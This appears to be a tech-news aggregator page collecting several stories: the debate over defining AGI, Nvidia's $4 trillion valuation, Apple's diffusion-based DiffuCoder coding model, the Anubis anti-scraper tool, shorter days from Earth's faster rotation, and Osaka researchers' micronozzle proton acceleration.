[...] The disconnect we've seen above between researcher consensus, firm terminology definitions, and corporate rhetoric has a real impact. When policymakers act as if AGI is imminent based on hype rather than scientific evidence, they risk making decisions that don't match reality. When companies write contracts around undefined terms, they may create legal time bombs.
The definitional chaos around AGI isn't just philosophical hand-wringing. Companies use promises of impending AGI to attract investment, talent, and customers. Governments craft policy based on AGI timelines. The public forms potentially unrealistic expectations about AI's impact on jobs and society based on these fuzzy concepts.
Without clear definitions, we can't have meaningful conversations about AI misapplications, regulation, or development priorities. We end up talking past each other, with optimists and pessimists using the same words to mean fundamentally different things.
For the first time ever, a company has achieved a market capitalization of $4 trillion. And that company is none other than Nvidia:
The chipmaker's shares rose as much as 2.5% on Wednesday, pushing past the previous market value record ($3.9 trillion), set by Apple in December 2024. Shares in the AI giant later closed at $162.88, shrinking the company's market value to $3.97 trillion.
Nvidia has rallied by more than 70% from its April 4 low, when global stock markets were sent reeling by President Donald Trump's global tariff rollout.
[...] The record value comes as tech giants such as OpenAI, Amazon and Microsoft are spending hundreds of billions of dollars in the race to build massive data centers to fuel the artificial intelligence revolution. All of those companies are using Nvidia chips to power their services, though some are also developing their own.
In the first quarter of 2025 alone, the company reported its revenue soared about 70%, to more than $44 billion. Nvidia said it expects another $45 billion worth of sales in the current quarter.
Also at: ZeroHedge, CNN and AP.
Related: Nvidia Reportedly Raises GPU Prices by 10-15% as Tariffs and TSMC Price Hikes Filter Down
Apple just released an interesting coding language model - 9to5Mac:
Apple quietly dropped a new AI model on Hugging Face with an interesting twist. Instead of writing code like traditional LLMs generate text (left to right, top to bottom), it can also write out of order, and improve multiple chunks at once.
The result is faster code generation, at a performance that rivals top open-source coding models. Here's how it works.
The nerdy bits
Here are some (overly simplified, in the name of efficiency) concepts that are important to understand before we can move on.
Autoregression
Traditionally, most LLMs have been autoregressive. This means that when you ask them something, they process your entire question, predict the first token of the answer, reprocess the entire question with the first token, predict the second token, and so on. This makes them generate text like most of us read: left to right, top to bottom.
Temperature
LLMs have a setting called temperature that controls how random the output can be. When predicting the next token, the model assigns probabilities to all possible options. A lower temperature makes it more likely to choose the most probable token, while a higher temperature gives it more freedom to pick less likely ones.
Diffusion
An alternative to autoregressive models is diffusion models, which have been more often used by image models like Stable Diffusion. In a nutshell, the model starts with a fuzzy, noisy image, and it iteratively removes the noise while keeping the user request in mind, steering it towards something that looks more and more like what the user requested.
Still with us? Great!
Lately, some large language models have looked to the diffusion architecture to generate text, and the results have been pretty promising. If you want to dive deeper into how it works, here's a great explainer:
Why am I telling you all this? Because now you can see why diffusion-based text models can be faster than autoregressive ones, since they can basically (again, basically) iteratively refine the entire text in parallel.
This behavior is especially useful for programming, where global structure matters more than linear token prediction.
Phew! We made it. So Apple released a model?
Yes. They released an open-source model called DiffuCode-7B-cpGRPO, that builds on top of a paper called DiffuCoder: Understanding and Improving Masked Diffusion Models for Code Generation, released just last month.
The paper describes a model that takes a diffusion-first approach to code generation, but with a twist:
"When the sampling temperature is increased from the default 0.2 to 1.2, DiffuCoder becomes more flexible in its token generation order, freeing itself from strict left-to-right constraints"
This means that by adjusting the temperature, it can also behave either more (or less) like an autoregressive model. In essence, Higher temperatures give it more flexibility to generate tokens out of order, while lower temperatures keep it closer to a strict left-to-right decoding.
And with an extra training step called coupled-GRPO, it learned to generate higher-quality code with fewer passes. The result? Code that's faster to generate, globally coherent, and competitive with some of the best open-source programming models out there.
Built on top of an open-source LLM by Alibaba
Even more interestingly, Apple's model is built on top of Qwen2.5‑7B, an open-source foundation model from Alibaba. Alibaba first fine-tuned that model for better code generation (as Qwen2.5‑Coder‑7B), then Apple took it and made its own adjustments.
They turned it into a new model with a diffusion-based decoder, as described in the DiffuCoder paper, and then adjusted it again to better follow instructions. Once that was done, they trained yet another version of it using more than 20,000 carefully picked coding examples.
And all this work paid off. DiffuCoder-7B-cpGRPO got a 4.4% boost on a popular coding benchmark, and it maintained its lower dependency on generating code strictly from left to right.
Of course, there is plenty of room for improvement. Although DiffuCoder did better than many diffusion-based coding models (and that was before the 4.4% bump from DiffuCoder-7B-cpGRPO), it still doesn't quite reach the level of GPT-4 or Gemini Diffusion.
And while some have pointed out that 7 billion parameters might be limiting, or that its diffusion-based generation still resembles a sequential process, the bigger point is this: little by little, Apple has been laying the groundwork for its generative AI efforts with some pretty interesting and novel ideas.
Whether (or if? When?) that will actually translate into real features and products for users and developers is another story.
Of course, Bill Gates says AI will replace humans for most things — but coding will remain "a 100% human profession" centuries later. So what's your take? Are programmers on the way out or safe?
AI Is Scraping the Web, but the Web Is Fighting Back:
AI is not magic. The tools that generate essays or hyper-realistic videos from simple user prompts can only do so because they have been trained on massive data sets. That data, of course, needs to come from somewhere, and that somewhere is often the stuff on the internet that's been made and written by people.
The internet happens to be quite a large source of data and information. As of last year, the web contained 149 zettabytes of data. That's 149 million petabytes, or 1.49 trillion terabytes, or 149 trillion gigabytes, otherwise known as a lot. Such a collective of textual, image, visual, and audio-based data is irresistible to AI companies that need more data than ever to keep growing and improving their models.
So, AI bots scrape the worldwide web, hoovering up any and all data they can to better their neural networks. Some companies, seeing the business potential, inked deals to sell their data to AI companies, including companies like Reddit, the Associated Press, and Vox Media. AI companies don't necessarily ask permission before scraping data across the internet, and, as such, many companies have taken the opposite approach, launching lawsuits against companies like OpenAI, Google, and Anthropic. (Disclosure: Lifehacker's parent company, Ziff Davis, filed a lawsuit against OpenAI in April, alleging it infringed Ziff Davis copyrights in training and operating its AI systems.)
Those lawsuits probably aren't slowing down the AI vacuum machines. In fact, the machines are in desperate need of more data: Last year, researchers found that AI models were running out of data necessary to continue with the current rate of growth. Some projections saw the runway giving out sometime in 2028, which, if true, gives only a few years left for AI companies to scrape the web for data. While they'll look to other data sources, like official deals or synthetic data (data produced by AI), they need the internet more than ever.
If you have any presence on the internet whatsoever, there's a good chance your data was sucked up by these AI bots. It's scummy, but it's also what powers the chatbots so many of us have started using over the past two and a half years.
But just because the situation is a bit dire for the internet at large, that doesn't mean its giving up entirely. On the contrary, there is real opposition to this type of practice, especially when it goes after the little guy.
In true David-and-Goliath fashion, one web developer has taken it upon themselves to build a tool for web developers to block AI bots from scraping their sites for training data. The tool, Anubis, launched at the beginning of this year, and has been downloaded over 200,000 times.
Anubis is the creation of Xe Iaso, a developer based out of Ottawa, CA. As reported by 404 Media, Iaso started Anubis after she discovered an Amazon bot clicking on every link on her Git server. After deciding against taking down the Git server entirely, she experimented with a few different tactics before discovering a way to block these bots entirely: an "uncaptcha," as Iaso calls it.
Here's how it works: When running Anubis on your site, the program checks that a new visitor is actually a human by having the browser run cryptographic math with JavaScript. According to 404 Media, most browsers since 2022 can pass this test, as these browsers have tools built-in to run this type of JavaScript. Bots, on the other hand, usually need to be coded to run this cryptographic math, which would be too taxing to implement on all bot scrapes en masse. As such, Iaso has figured out a clever way to verify browsers via a test these browsers pass in their digital sleep, while blocking out bots whose developers can't afford the processing power required to pass the test.
This isn't something the general web surfer needs to think about. Instead, Anubis is made for the people who run websites and servers of their own. To that point, the tool is totally free and open source, and is in continued development. Iaso tells 404 Media that while she doesn't have the resources to work on Anubis full time, she is planning to update the tool with new features. That includes a new test that doesn't push the end-user's CPU as much, as well as one that doesn't rely on JavaScript, as some users disable JavaScript as a privacy measure.
If you're interested in running Anubis on your own server, you can find detailed instructions for doing so on Iaso's GitHub page. You can also test your own browser to make sure you aren't a bot.
Iaso isn't the only one on the web fighting back against AI crawlers. Cloudflare, for example, is blocking AI crawlers by default as of this month, and will also let customers charge AI companies that want to harvest the data on their sites. Perhaps as it becomes easier to stop AI companies from openly scraping the web, these companies will scale back their efforts—or, at the very least, offer site owners more in return for their data.
My hope is that I run into more websites that initially load with the Anubis splash screen. If I click a link, and am presented with the "Making sure you're not a bot" message, I'll know that site has successfully blocked these AI crawlers. For a while there, the AI machine felt unstoppable. Now, it feels like there's something we can do to at least put it in check.
See Also:
Earth is going to spin much faster over the next few months:
Earth is expected to spin more quickly in the coming weeks, making some of our days unusually short. On July 9, July 22 and Aug. 5, the position of the moon is expected to affect Earth's rotation so that each day is between 1.3 and 1.51 milliseconds shorter than normal.
A day on Earth is the length of time needed for our planet to fully rotate on its axis — approximately 86,400 seconds, or 24 hours. But Earth's rotation is affected by a number of things, including the positions of the sun and moon, changes to Earth's magnetic field, and the balance of mass on the planet.
Since the relatively early days of our planet, Earth's rotation has been slowing down, making our days longer. Researchers found that about 1 billion to 2 billion years ago,a day on Earth was only 19 hours long. This is likely because the moon was closer to our planet, making its gravitational pull stronger than it is now and causing Earth to spin faster on its axis.
Since then, as the moon has moved away from us, days on average have been getting longer. But in recent years, scientists have reported variations in Earth's rotation. In 2020, scientists found that Earth was spinning more quickly than at any point since records began in the 1970s, and we saw the shortest-ever recorded day on July 5, 2024, which was 1.66 milliseconds shy of 24 hours, according to timeanddate.com.
On July 9, July 22 and Aug. 5, 2025, the moon will be at its furthest distance from Earth's equator, which changes the impact its gravitational pull has on our planet's axis. Think of the Earth as a spinning top — if you were to put your fingers around the middle and spin, it wouldn't rotate as quickly as if you were to hold it from the top and bottom.
With the moon closer to the poles, the Earth's spin speeds up, making our day shorter than usual.
These variations are to be expected, but recent research suggests that human activity is also contributing tothe change in the planet's rotation. Researchers at NASA have calculated that the movement of ice and groundwater, linked to climate change, has increased the length of our days by1.33 milliseconds per century between 2000 and 2018.
Single events can also affect Earth's spin: the 2011 earthquake that struck Japanshortened the length of the day by 1.8 microseconds. Even the changing seasons affect Earth's spin,Richard Holme, a geophysicist at the University of Liverpool, told Live Science via email.
"There is more land in the northern hemisphere than the south," Holme said. "In northern summer, the trees get leaves, this means that mass is moved from the ground to above the ground — further away from the Earth's spin axis." The rate of rotation of any moving body is affected by its distribution of mass. When an ice skater spins on the spot, they rotate faster when their arms are tight to their chest, and slow themselves down by stretching their arms out. As Earth's mass moves away from its core in summer, its rate of rotation must decrease, so the length of the day increases, Holme explained.
Of course, on the days in question our clocks will still count 24 hours. The difference isn't noticeable on the individual level.
The only time we would see a change to time zones is if the difference between the length of day is greater than 0.9 seconds, or 900 milliseconds. Though this has never happened in a single day, over the years our clocks fall out of sync with the position of the planet. This is monitored by the International Earth Rotation and Reference Systems Service (IERS), which will add a "leap second" to UTC as needed to bring us back in line.
Compact GeV Proton Acceleration Using Ultra-Intense Lasers:
According to a study published in Scientific Reports, researchers at the University of Osaka have proposed "micronozzle acceleration"—a unique approach for creating giga-electron-volt proton beams using ultra-intense lasers.
Proton beams with giga-electron-volt (GeV) energy, previously considered possible only with giant particle accelerators, may soon be created in small setups, owing to a discovery by researchers at the University of Osaka.
Professor Masakatsu Murakami's team invented a revolutionary idea known as micronozzle acceleration (MNA). The researchers achieved a world-first by constructing a microtarget with small nozzle-like characteristics and irradiating it with ultraintense, ultrashort laser pulses. This was accomplished using extensive numerical simulations.
Unlike traditional laser-based acceleration methods, which use flat targets and have energy limits below 100 mega-electron-volts (1 GeV = 1000 MeV), the micronozzle structure allows for sustained, stepwise acceleration of protons within a powerful quasi-static electric field created inside the target. This innovative method permits proton energy to approach 1 GeV while maintaining great beam quality and stability.
This discovery opens a new door for compact, high-efficiency particle acceleration. We believe this method has the potential to revolutionize fields such as laser fusion energy, advanced radiotherapy, and even laboratory-scale astrophysics.
Masakatsu Murakami, Professor, The University of Osaka
The implications are extensive:
- Energy: supports laser-driven nuclear fusion with rapid ignition techniques
- Medicine: Makes proton cancer treatment systems more accurate and compact
- Fundamental Science: Enables the simulation of harsh astrophysical settings and the investigation of matter under extremely powerful magnetic fields.
The study is the first theoretical proof of compact GeV proton acceleration utilizing microstructured targets. It is based on simulations conducted on the University of Osaka's SQUID supercomputer.
Journal Reference:
Murakami, M., Balusu, D., Maruyama, S., et al. Generation of giga-electron-volt proton beams by micronozzle acceleration [open], Scientific Reports (DOI: 10.1038/s41598-025-03385-x)
See also: